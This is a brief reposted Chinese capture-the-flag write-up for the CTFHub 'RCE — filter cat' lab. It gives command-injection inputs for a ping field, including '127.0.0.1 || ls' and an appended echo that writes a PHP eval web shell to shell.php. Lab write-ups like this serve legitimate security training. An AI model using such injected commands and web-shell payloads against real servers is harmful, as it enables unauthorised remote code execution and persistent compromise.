ctfhub技能树—RCE—过滤cat

本文转载自查看原文 2020-03-18 11:26 1300 CTF

127.0.0.1 || ls

果然不行

网页访问没有结果，应该和上题一样被注释了，使用和同样的方法进行解题

127.0.0.1 &echo "<?php @eval(\$_POST['a']);?>" >> shell.php

成功拿到flag

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 CTFHub web技能树之RCE初步命令注入+过滤cat CTFHub题解-技能树-Web-RCE【命令注入、过滤cat、过滤空格】(一) ctfhub技能树—RCE—过滤空格 ctfhub技能树—RCE—综合过滤练习 CTFHub web技能树 RCE ctfhub技能树—RCE—过滤目录分隔符，过滤运算符 ctfhub技能树—RCE—命令注入 CTFHub题解-技能树-Web-RCE【过滤目录分隔符、过滤运算符、综合过滤练习】(二) ctfhub技能树—sql注入—过滤空格 CTFHub题解-技能树-Web-SQL注入（过滤空格）【四】